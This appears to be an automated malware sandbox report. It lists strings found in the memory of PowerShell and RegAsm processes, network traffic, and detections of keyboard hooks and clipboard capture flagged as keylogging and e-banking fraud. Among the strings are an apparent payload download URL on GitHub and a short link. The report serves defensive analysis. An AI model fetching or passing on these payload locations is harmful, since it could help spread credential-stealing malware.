                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 0000000A.00000002.418435992.0000000002710000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.411890930.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.420592659.00000000001C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 00000012.00000002.420615774.00000000003BC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
                  Source: RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://www.msn.com/
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: RegAsm.exe, 0000000F.00000002.423427306.00000000003A3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://contextual.media.net/
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: S7UYq0.url.0.drString found in binary or memory: https://og1.in/S7UYq0
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: powershell.exe, 0000000C.00000002.411890930.00000000027EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 0000000C.00000002.411890930.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.411890930.000000000310A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 0000000F.00000002.423803853.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.423808460.0000000002C90000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.423818724.0000000002DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv77DF.tmp.15.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000014_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,14_2_0040A41B
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
